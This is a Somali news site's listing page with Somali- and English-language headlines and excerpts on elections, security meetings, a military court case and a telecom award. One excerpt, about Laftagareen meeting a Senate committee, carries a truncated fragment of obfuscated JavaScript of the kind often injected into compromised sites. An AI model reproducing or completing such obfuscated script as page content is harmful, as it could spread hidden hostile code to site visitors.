Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Kulan looga tashanayo geedi socodka doorayooyinka oo la furmay Muqdisho

MUQDISHO (SMN) - Magaalada muqdisho maanta waxaa ka furmay kulan looga tashanayo geedi socodka iyo hanaanka doorayooyinka Jamhuuriyada Federaalka Soomaaliya kaas oo daba socda heshiiskii ee May 2023.   Kulankaan waxaa goob joog ka ah wasiiro katirsan dowladda, Ururrada Siyaasadda iyo bulshada rayidka ah kuwaas oo dhammaantood laga doonayo inay aragti ku biiriyaan arimaha la xariira doorashooyinka. Wasiirka Arrimaha Gudaha Mudane Ahmed...

Madaxweyne Laftagareen oo gaaray degmada Diinsoor + Sawirro

DIINSOOR (SMN) -Madaxweynaha Dowlad gobolleedka Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagaree, wasiirka Gaashaandhigga XFS mudane Cabduqaadir Maxamed Nuur iyo qaar ka mid ah golaha wasiirada Koonfur Galbeed iyo mas’uuliyiin kale ayaa si weyn loogu soo dhaweeyey maanta magaalada Diin-soor ee Gobolk Bay.   Ujeedka ay madaxdu halkaas u gaareen ayaa lagu sheegay in ay tahay soo xerista shir dib u...

UN independent expert highlights cross-cutting nature of human rights in Somalia

MOGADISHU, Somalia - Wrapping up her second visit to the Horn of Africa country, the Independent Expert on the Situation of Human Rights in Somalia today highlighted the interlinkages of human rights and other developments in the country.   “It is important to recall the cross-cutting nature of human rights. The struggles against armed groups, peace, security, development, humanitarian action,...

Sawirro: Golaha Wasiirada oo xalay yeeshay shir deg-deg ah + Ujeedka

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo xalay yeeshay kulan deg-deg ah, ayaa lagu meelmariyey hindise sharciyeedka Dad-dhigista iyo tirakoobka xaaladaha madaniga ah.   Hindisaha-sharci ee Dad-dhigista iyo Tirakoobka Xaaladaha Madaniga ah ayaa muhiimad weyn u leh dib-u-dhiska iyo nidaaminta adeegyada dad-dhigista ee Jamhuuriyadda Federaalka Soomaaliya. Shirka oo uu guddoomiyey Ra’iisul Wasaaraha Xukuumadda JFS, Mudane Xamsa Cabdi Barre, ayaa...

Somali president chairs meeting on fight against Al-Shabaab

MOGADISHU, Somalia - The president of Somalia Hassan Sheikh chaired a National Security Committee meeting focused on accelerating efforts to eradicate terrorist groups.   Emphasis was also on fostering collaboration among government security branches and preparation for the New York security conference for Somalia. The chiefs of the military and security forces were in attendance at the meeting to brief the committee,...

Sawirro: Madaxweyne Xasan Sheekh oo guddoomiyay shirka amniga qaranka

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya ahna Taliyaha Guud ee Ciidamada Qalabka Sida Mudane Xasan Sheekh Maxamuud oo guddoomiyey Shirka Guddiga Amniga Qaran ayaa looga hadalay tallaaabooyinka loo qaaday xaqiijinta amniga caasimadda, dib u dhiska ciidamada, xoreynta deegaannada ku jira gacanta argagixisada iyo qorshaha Soomaaliya ee shir looga hadlayo amniga dalka oo ay wadajir u qabanayaan DFS, QM iyo...

Deni says ready for genuine dialogue to end Puntland electoral crisis

GAROWE, Somalia - Puntland President Said Abdullahi Deni broke the silence about the escalating electoral rift in the Federal State which is on the brink of turning into conflict.   President Deni said that he is not ready to sit down with the opposition candidates at the negotiation table to discuss a peaceful, transparent, and fair election in Puntland next year. Speaking...

Laftagareen oo qaabilay guddiga ka socday DF iyo dowlad goboleedyada

BAYDHABO (SMN) - Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen ayaa qaabilay Gudiga Arimaha Gudaha Dib-Uheshiisinta Arimaha Federaalka iyo Xiriirka Dowladaha Xubnaha ka ah Dowladda Federaalka Soomaaliya ee Aqalka Sare BFS.   Kulanka ayaa looga hadlay Arimaha Fatahaadaha, Xoojinta Xiriirka Dowladdaha Xubanaha ka ah Dowladda Federaalka iyo Arimaha Dib-Uheshiisinta. Halkan hoose ka daawo Sawirrada:- function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...

Maxkamadda Ciidamada oo u fariisatay dhageysiga rag loo haysto Shabaabnimo

MUQDISHO (SMN) - Maxkamada Ciidamada Qalabka sida ayaa markale u fariisatay garmaqalka 10-ruux oo ku eedeeysan kamid noqoshada Al-shabaab.   10-kan ayaa safar u ahaa buuraha Galgala si ay ugu biiraan kooxaha argagixisada ee ku dhuumaaleysanaya buuraha sil-siladda ah ee Puntland. Kiiskan ayaa maanta y fariisatay maxkamadda ciidamada qalabka sida ee Soomaaliya, waxaana qeyb ka mid ah raggan loo haystaa in ay...

Hormuud Telecom’s CEO, Ahmed Yusuf, Clinches CXO of the Year Award at Africa Tech Festival 2023

Ahmed Mohamud Yusuf, Chairman of Hormuud Telecommunications Company in Somalia has won the prestigious CXO of the Year Award at the Africa Tech Festival 2023.   The Africa Tech Festival Awards are a celebration of the work done across the continent to boost tech connectivity, accessibility, and innovation. The CXO of the Year Award honors Chief Executive Officers (CEOs), Chief Technology Officers...

WARAR KALE

Somalia inaugurates renovated women’s mental health unit in Mogadishu

MOGADISHU, Somalia – Somalia's Deputy Prime Minister Salah Ahmed Jama on Sunday inaugurated a newly renovated women's mental health unit at Lansaleeti Hospital in...

Guddoomiyaha Gobolka Banaadir oo xarigga ka jaray Waddada Kalkaal ee degmada Kaxda

MUQDISHO - Guddoomiyaha Maamulka Gobolka Banaadir ahna Duqa Magaalada Muqdisho, Dr. Xasan Maxamed Xuseen (Muungaab), ayaa xarigga ka jaray Waddada Kalkaal ee degmada Kaxda,...

Danjiraha Soomaaliya ee Burkina Faso oo kulamo la yeeshay Wasiirka Macdanta dalkaasi

Ouagadougou, Burkina Faso – Danjiraha Jamhuuriyadda Federaalka Soomaaliya ee Burkina Faso, Danjire Jaamac Xasan Khaliif, ayaa maanta kulan la qaatay Wasiirka Macdanta iyo Tamarta...